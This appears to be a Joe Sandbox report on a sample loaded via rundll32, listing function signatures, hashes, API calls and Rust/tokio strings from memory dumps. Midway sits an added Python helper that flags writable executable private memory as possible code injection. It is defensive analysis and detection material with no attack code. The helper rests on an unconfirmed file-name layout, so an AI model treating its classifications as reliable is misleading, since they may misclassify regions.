                               • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: memmove$DecryptMessagememset
                              • String ID: assertion failed: pos <= self.dec_in.get_ref().len() as u64
                              • API String ID: 522839164-2093299206
                              • Opcode ID: cf81bec3205ead41921637b9c751b7692368adc342a828d35acd5a1a43da8aae
                              • Instruction ID: 2f84faf657ea1b1fdf400d309ec714c7af34fbeb65d1163fcc170757f4599b72
                              • Opcode Fuzzy Hash: cf81bec3205ead41921637b9c751b7692368adc342a828d35acd5a1a43da8aae
                              • Instruction Fuzzy Hash: 52918C716087109FD310DF2AE580B5BB7E1FF89318F109A2DE59987B50EB71E889CB52
                              APIs
                              • memmove.VCRUNTIME140(?,00000000,00000094), ref: 6CBEEF43
                              • memmove.VCRUNTIME140(?,?,00000094), ref: 6CBEEF6A
                              Strings
                              • internal error: entered unreachable codeD:\rust\cargo\registry\src\index.crates.io-6f17d22bba15001f\tokio-1.42.0\src\runtime\blocking\schedule.rs, xrefs: 6CBF02B6
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                               • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: memmove
                              • String ID: internal error: entered unreachable codeD:\rust\cargo\registry\src\index.crates.io-6f17d22bba15001f\tokio-1.42.0\src\runtime\blocking\schedule.rs
                              • API String ID: 2162964266-2861346101
                              • Opcode ID: dabf73215a7be6f32db765698064d4ac85bb17ce3e9c0cdadb6fff7e7fd05783
                              • Instruction ID: de10a25a16272a507eb4004824085150bbf82509d0add75d2b09e7cc8cd38d4d
                              • Opcode Fuzzy Hash: dabf73215a7be6f32db765698064d4ac85bb17ce3e9c0cdadb6fff7e7fd05783
                              • Instruction Fuzzy Hash: CF825A75A093818FD324CF18D480BDEB7E1EFD9754F148A2DE89897790D770A989CB82
                              APIs
                              Memory Dump Source
                              • Source File: 00000003.00000002.3544730523.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4660000_rundll32.jbxd
                              Similarity
                              • API ID: Xinvalid_argumentstd::_swprintf
                              • String ID:
                              • API String ID: 2109912724-0
                              • Opcode ID: 04b2acf99b33ccf9c52ea25fa5a2854a04adf054afa153323b5f5cccbd1f206d
                              • Instruction ID: d0d18eb6a51cd8a820373adc49ada9be7aa4133a817f3e5cd526af2eb1c8ab78
                              • Opcode Fuzzy Hash: 04b2acf99b33ccf9c52ea25fa5a2854a04adf054afa153323b5f5cccbd1f206d
                              • Instruction Fuzzy Hash: 71E15171A001259FDF64DE64DC80BEEB3B5EB99304F1446ADD94AA7384E731BE818F90
                              APIs
                              • __aulldiv.LIBCMT ref: 6CBF257B
                              • memmove.VCRUNTIME140(?,?,?), ref: 6CBF2890
                              • memmove.VCRUNTIME140(?,?,?,00000000,?,00000000), ref: 6CBF28F4
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                               • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: memmove$__aulldiv
                              • String ID:
                              • API String ID: 3540790784-0
                              • Opcode ID: 7627c91e58819b67982dd5d2bce57a86b3645372a4bfc80c829d7e4dbbb58a9a
                              • Instruction ID: e11a1fd9fcee75d12d289f75de1efa95e8094e9ac7de2839809754f58f1871d7
                              • Opcode Fuzzy Hash: 7627c91e58819b67982dd5d2bce57a86b3645372a4bfc80c829d7e4dbbb58a9a
                              • Instruction Fuzzy Hash: F9D1E2316083859FD725CF28C89469EB7E2EFC9314F15892DE49997760DB30EC4A8B83
                              Strings
                              • mut const ; dyn + unsafe extern ", xrefs: 6CC24788
                              • internal error: entered unreachable codeD:\rust\cargo\registry\src\index.crates.io-6f17d22bba15001f\tokio-1.42.0\src\runtime\blocking\schedule.rs, xrefs: 6CC24EF7
                              • :, xrefs: 6CC24BCA
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                               • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: memmove
                              • String ID: mut const ; dyn + unsafe extern "$:$internal error: entered unreachable codeD:\rust\cargo\registry\src\index.crates.io-6f17d22bba15001f\tokio-1.42.0\src\runtime\blocking\schedule.rs
                              • API String ID: 2162964266-1873620769
                              • Opcode ID: a5652424d474f181f358c2c39fcda87c4ced11331d53b2e0b209c36bddfc470c
                              • Instruction ID: d5e9d8a3cfb78fe158270952687e146c62d1b0c8c88658200d283d230d898703
                              • Opcode Fuzzy Hash: a5652424d474f181f358c2c39fcda87c4ced11331d53b2e0b209c36bddfc470c
                              • Instruction Fuzzy Hash: 91329F716083419FC714CF29C490B6ABBE2BFC8354F15891DE8999B751EB74EC46CB82
                              APIs
                                • Part of subcall function 6CC39B05: memset.VCRUNTIME140(00000000,00000000,?,?,?,?,6CC3985C), ref: 6CC39B28
                              • DecryptMessage.SECUR32(?,?,00000000,00000000), ref: 6CC10450
                                • Part of subcall function 6CBE885A: memmove.VCRUNTIME140(?,?,?,?,?,?,6CBEC2F6,?,?,6CC3460C,?,6CC3463F), ref: 6CBE8883
                                • Part of subcall function 6CC46438: memmove.VCRUNTIME140(?,HTTP/1.1 100 Continueinternal error: entered unreachable code: poll_read_body invalid state: ,?,?,00000002,?,?,?,6CC250BB,00000019), ref: 6CC464C5
                              Strings
                              • assertion failed: pos <= self.dec_in.get_ref().len() as u64, xrefs: 6CC1063E
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                               • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: memmove$DecryptMessagememset
                              • String ID: assertion failed: pos <= self.dec_in.get_ref().len() as u64
                              • API String ID: 522839164-2093299206
                              • Opcode ID: 332aa5b06539ad058e3c3498ec514a7f3fba59982142945d078eca46dee2ea26
                              • Instruction ID: 08851b59e6a6b3f38634723400f96058008038f140d7a3efac05c515bd607627
                              • Opcode Fuzzy Hash: 332aa5b06539ad058e3c3498ec514a7f3fba59982142945d078eca46dee2ea26
                              • Instruction Fuzzy Hash: F191A030708745DFD704DF26C480B9AF7E1BF88318F108A2DE59997B40EB75A898DB96
                              APIs
                              • __aulldiv.LIBCMT ref: 6CBF6856
                                • Part of subcall function 6CC4FDD0: QueryPerformanceCounter.KERNEL32 ref: 6CC4FE15
                                • Part of subcall function 6CC4FDD0: QueryPerformanceFrequency.KERNEL32 ref: 6CC4FE5C
                                • Part of subcall function 6CC4FDD0: __aulldiv.LIBCMT ref: 6CC4FE97
                                • Part of subcall function 6CC4FDD0: __aulldiv.LIBCMT ref: 6CC4FEF2
                                • Part of subcall function 6CC4FDD0: __aulldiv.LIBCMT ref: 6CC4FF07
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                               • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: __aulldiv$PerformanceQuery$CounterFrequency
                              • String ID:
                              • API String ID: 2403592835-0
                              • Opcode ID: 76103bf25aeb606303f27c612dc226ebb9b35b930fdea886f526abffd76bda27
                              • Instruction ID: 5a0792c4881d5a86333e51e41d7817a7b25f99eef9c6b7d977be74ef72a99aec
                              • Opcode Fuzzy Hash: 76103bf25aeb606303f27c612dc226ebb9b35b930fdea886f526abffd76bda27
                              • Instruction Fuzzy Hash: 5E127B716083419FC704CF28C490A5AB7F1FF89358F19896DE8A9DB751D731E94ACB82
                              Strings
                              • called `Result::unwrap()` on an `Err` value, xrefs: 6CC06C9D, 6CC06CDD
                              • Map must not be polled after it returned `Poll::Ready`, xrefs: 6CC06C71
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                               • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID:
                              • String ID: Map must not be polled after it returned `Poll::Ready`$called `Result::unwrap()` on an `Err` value
                              • API String ID: 0-3366255769
                              • Opcode ID: 245e56800fb440febce81f0068927eed9b278193209074d623ef697a856a95ae
                              • Instruction ID: edee76afec31fd6ad558f4cd5558fc6ecefd5fa71df0c297ad538d4186f18b7a
                              • Opcode Fuzzy Hash: 245e56800fb440febce81f0068927eed9b278193209074d623ef697a856a95ae
                              • Instruction Fuzzy Hash: 1C626D75A08B818FC725CF24C49069EF7F1BFC9314F148A5DE8899B751EB709989CB42
                              APIs
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                               • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: CancelErrorFileStatus
                              • String ID:
                              • API String ID: 1267829034-0
                              • Opcode ID: d87c28d415e18c3cd33d71e4830764521cb30a4b8c0e4ee15ccb7527e1d92243
                              • Instruction ID: 3379aeba699379751d951222397d59c1078e7fc449ec644001e430c0ea39a1ff
                              • Opcode Fuzzy Hash: d87c28d415e18c3cd33d71e4830764521cb30a4b8c0e4ee15ccb7527e1d92243
                              • Instruction Fuzzy Hash: 542184B1804742AFEB148F15D408756FBB4FF40319F28C99EE0598BB42D3B5D58ACB82
                              APIs
                              • memmove.VCRUNTIME140(?,?,?), ref: 6CC62D3B
                              • memset.VCRUNTIME140(?,000000FF,-00000010), ref: 6CC62F10
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                               • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: memmovememset
                              • String ID:
                              • API String ID: 1288253900-0
                              • Opcode ID: dd386c8f62c454d8b82373341f9de689444e6fa721b59882a5b6cd004f753fff
                              • Instruction ID: a3ea441de7ade7e3990fd7306f1176945e0c7add4ca205000a40feabe59abe32
                              • Opcode Fuzzy Hash: dd386c8f62c454d8b82373341f9de689444e6fa721b59882a5b6cd004f753fff
                              • Instruction Fuzzy Hash: BEC1CE356087428BC715CF29C99046AF7E1FFC9314F148A6EE8E597751EB30E946CB82
                              APIs
                              • memmove.VCRUNTIME140(?,?,?), ref: 6CC62947
                              • memset.VCRUNTIME140(000000FF,000000FF,-00000010), ref: 6CC629D0
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                               • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: memmovememset
                              • String ID:
                              • API String ID: 1288253900-0
                              • Opcode ID: d5aba16d235ed406635b61a116f082f8234feeb0e906658cb57c7a77b4bf6f23
                              • Instruction ID: cc48907815b195db928ef10b94df5d7f412d00604c50225208a951fd015ab1fb
                              • Opcode Fuzzy Hash: d5aba16d235ed406635b61a116f082f8234feeb0e906658cb57c7a77b4bf6f23
                              • Instruction Fuzzy Hash: F5B1D0716087418BD715CF2DC59452EFBE2FFC9214F248A2DE89997B51E730E845CB82
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3544730523.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4660000_rundll32.jbxd
                              Similarity
                              • API ID:
                              • String ID: l$ntdl
                              • API String ID: 0-924918826
                              • Opcode ID: c362b51c53e3eeabca090c6237b61e6bcf708d1a3817c6eecd03a2daff8ddda5
                              • Instruction ID: 9e2e5841ff3f1dd149a4d9da30bffb154edf212a670e2276cff3409ca97caee0
                              • Opcode Fuzzy Hash: c362b51c53e3eeabca090c6237b61e6bcf708d1a3817c6eecd03a2daff8ddda5
                              • Instruction Fuzzy Hash: 7521DF75A045209F9B29DF14849862FBBA6EF4571471180ADE8079F354FB34E9028BD5
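The function above was lifted from the dump at 04660000, which the report marks "based on PE: false", unlike the dumps at 6CBC0000 that belong to the loaded module. A practitioner triaging this report wants to tell those two kinds of region apart quickly. The helper below is an added example, not part of the Joe Sandbox report or its IDA plugin. It assumes (consistently with every name on this page, but not documented here) that the dotted fields after the base address in an .sdmp name are the page protection, a state field, the allocation type and an index, and it decodes the protection and type fields with the standard Windows MEMORY_BASIC_INFORMATION constants. Under that assumption, the 04660000 region is PAGE_EXECUTE_READWRITE and MEM_PRIVATE, i.e. executable, writable memory that no image backs, which is the shape injected code or a manually mapped payload takes; the 6CBC1000 region is PAGE_EXECUTE_READ and MEM_IMAGE, ordinary module code.

```python
"""Added triage helper (example code, not from the report): decode the
region attributes encoded in Joe Sandbox .sdmp file names and flag
regions that look like injected code.

ASSUMPTION: in a name such as
  00000003.00000002.3544730523.0000000004660000.00000040.00001000.00020000.00000000.sdmp
the dotted fields are pid, stage, serial, base address, page
protection, a state field, allocation type and an index.  Only the
protection and type fields are interpreted here.
"""
import re
from dataclasses import dataclass

# Windows page-protection constants (winnt.h)
PAGE_EXECUTE_READ = 0x20
PAGE_EXECUTE_READWRITE = 0x40
EXECUTABLE_MASK = 0x10 | 0x20 | 0x40 | 0x80   # any PAGE_EXECUTE* value
WRITABLE_MASK = 0x04 | 0x08 | 0x40 | 0x80     # READWRITE, WRITECOPY, EXECUTE_READWRITE, EXECUTE_WRITECOPY

# Windows allocation-type constants (winnt.h)
MEM_PRIVATE = 0x20000
MEM_MAPPED = 0x40000
MEM_IMAGE = 0x1000000

_NAME_RE = re.compile(
    r"^(?P<pid>[0-9a-f]{8})\.(?P<stage>[0-9a-f]{8})\.(?P<serial>\d+)\."
    r"(?P<base>[0-9a-f]{16})\.(?P<protect>[0-9a-f]{8})\.(?P<state>[0-9a-f]{8})\."
    r"(?P<type>[0-9a-f]{8})\.(?P<index>[0-9a-f]{8})\.sdmp$",
    re.IGNORECASE,
)


@dataclass(frozen=True)
class Region:
    base: int
    protect: int
    mem_type: int

    @property
    def executable(self) -> bool:
        return bool(self.protect & EXECUTABLE_MASK)

    @property
    def writable(self) -> bool:
        return bool(self.protect & WRITABLE_MASK)

    @property
    def image_backed(self) -> bool:
        return self.mem_type == MEM_IMAGE


def parse_dump_name(name: str) -> Region:
    """Split an .sdmp file name into the fields this helper uses."""
    m = _NAME_RE.match(name)
    if not m:
        raise ValueError(f"not a recognised .sdmp name: {name}")
    return Region(
        base=int(m["base"], 16),
        protect=int(m["protect"], 16),
        mem_type=int(m["type"], 16),
    )


def triage(name: str) -> str:
    """Classify a dumped region.

    'injected-code-candidate': executable, writable and not image-backed,
    the shape of shellcode or a manually mapped payload (and the case the
    report itself marks 'based on PE: false').
    'non-image-executable': executable but read-only and not image-backed
    (worth a look, e.g. a region re-protected after writing).
    'image-code': executable pages of a loaded module.
    'data': everything else.
    """
    r = parse_dump_name(name)
    if r.executable and not r.image_backed:
        return "injected-code-candidate" if r.writable else "non-image-executable"
    if r.executable and r.image_backed:
        return "image-code"
    return "data"


# Both names are copied from the report above.
IMAGE_DUMP = "00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp"
PRIVATE_DUMP = "00000003.00000002.3544730523.0000000004660000.00000040.00001000.00020000.00000000.sdmp"

if __name__ == "__main__":
    for n in (IMAGE_DUMP, PRIVATE_DUMP):
        r = parse_dump_name(n)
        print(f"{r.base:#010x} protect={r.protect:#x} type={r.mem_type:#x} -> {triage(n)}")
```

Run it over every "Source File" name in the report to get a short list of regions to open first; the 04660000 dump lands in the injected-code-candidate bucket, the 6CBC0000 family in image-code. The classification is only as good as the field-layout assumption, so confirm it against the sandbox's own memory map before relying on it in tooling.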
                              Strings
                              • keep-aliveHTTP/1.1 100 Continueinternal error: entered unreachable code: poll_read_body invalid state: , xrefs: 6CC24048
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                               • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID:
                              • String ID: keep-aliveHTTP/1.1 100 Continueinternal error: entered unreachable code: poll_read_body invalid state:
                              • API String ID: 0-2895536077
                              • Opcode ID: c1821cc5eaf18b6d2eae17ac0755078687efb9f8eac15485c6737de95bfca350
                              • Instruction ID: 7971b693aa4beb2653e92b9a566eebc9461cfe6fee7acd6b52a7a60bff13b61e
                              • Opcode Fuzzy Hash: c1821cc5eaf18b6d2eae17ac0755078687efb9f8eac15485c6737de95bfca350
                              • Instruction Fuzzy Hash: B242C0715087818FD710CF25C09079AFBF1BF89359F148A5DE8899B792D778E889CB82
                              APIs
                              • memmove.VCRUNTIME140(?,?,00000094), ref: 6CBF0CE7
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                               • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: memmove
                              • String ID:
                              • API String ID: 2162964266-0
                              • Opcode ID: 5ac2172b942ce0c1242f3431ee7e73af95f48dcf95fc415f209a9a6a8ddd5bf8
                              • Instruction ID: 4d1b7991071e00e614be163aebaa425efd7f999f1d4491608e7e5829894597a4
                              • Opcode Fuzzy Hash: 5ac2172b942ce0c1242f3431ee7e73af95f48dcf95fc415f209a9a6a8ddd5bf8
                              • Instruction Fuzzy Hash: 7C323975A083828FD324CF25D19079AF7E1FFC9354F148A2DE4A997B51D770A84ACB82
                              APIs
                              • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 6CC618ED
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                               • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: FeaturePresentProcessor
                              • String ID:
                              • API String ID: 2325560087-0
                              • Opcode ID: 823b22c2f26ac6acd9275f20fe4a42edcd4850cca537b97e9de23188bff3a335
                              • Instruction ID: b6278ac51ff36d63763363ea0d7fe057a3247394dfbb6c5cd65aa5e956256d23
                              • Opcode Fuzzy Hash: 823b22c2f26ac6acd9275f20fe4a42edcd4850cca537b97e9de23188bff3a335
                              • Instruction Fuzzy Hash: 69A19DB2A01205CFDB08CF6AC5E579EBBF1FB49315F24A12AD415E7650E7349A41CF50
                              APIs
                              • memcmp.VCRUNTIME140(?,?,00000000), ref: 6CBCCC39
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                               • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: memcmp
                              • String ID:
                              • API String ID: 1475443563-0
                              • Opcode ID: badcae1696984b9812dbf313ec2e89127bd4d78c79c9cec03cf0393462ece4ed
                              • Instruction ID: 7a3c60479a83ce4c2c81495015388e75f923c6d4788807c74984754db8763835
                              • Opcode Fuzzy Hash: badcae1696984b9812dbf313ec2e89127bd4d78c79c9cec03cf0393462ece4ed
                              • Instruction Fuzzy Hash: 9CF11471F0426A8FDB05DF7DC4902AEB7A2AFEA304F19872AE815B7741D7709D428781
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                               • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID:
                              • String ID: http://
                              • API String ID: 0-1121587658
                              • Opcode ID: 699d37413caa1eb6673f0fa27d838cbc2702481b4ffa8543e533cea014e1ce48
                              • Instruction ID: f145a5f896537991104c2dce22caf073cf735ac4f960bb8b9841c5f5b638fbcd
                              • Opcode Fuzzy Hash: 699d37413caa1eb6673f0fa27d838cbc2702481b4ffa8543e533cea014e1ce48
                              • Instruction Fuzzy Hash: A712267460CB458FD754CF2AC090A6ABBE1BF89344F108A2EE4D98BB50E774D949DB42
                              APIs
                              • EncryptMessage.SECUR32(?,00000000,?,00000000), ref: 6CC3EA73
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                               • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: EncryptMessage
                              • String ID:
                              • API String ID: 801064719-0
                              • Opcode ID: 6df8db487019d16d208e07550c42c9db929bfdd01abd4094dfa544c9488ee015
                              • Instruction ID: d4bfa1a105921f8a0f97028e35861abc3e2b3b2b6cce6a12c37634a5fd86f71d
                              • Opcode Fuzzy Hash: 6df8db487019d16d208e07550c42c9db929bfdd01abd4094dfa544c9488ee015
                              • Instruction Fuzzy Hash: A76128B16087059FD354CF29D480B9BB7E1BF88318F14892DE5AE87740E775A844CB96
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                               • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID:
                              • String ID: UNC\
                              • API String ID: 0-505053535
                              • Opcode ID: d58f443755bce69ebeeb51e0dba0d733de3ef79d70e219aafdf55eb8ec6ee794
                              • Instruction ID: 4ea02e3a8c8decd9c5c4802203467e25c07d45076f3c533d71944f097f7e5a5c
                              • Opcode Fuzzy Hash: d58f443755bce69ebeeb51e0dba0d733de3ef79d70e219aafdf55eb8ec6ee794
                              • Instruction Fuzzy Hash: CFE16AB1D046558FEB04CF9AC4A47BEBBF1AF86318F19C159C4642BAE2E3744949CF90
                              Strings
                              • {invalid syntax}{recursion limit reached}?'for<> ::{closureshim# as mut const ; dyn + unsafe extern ", xrefs: 6CC444E7
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
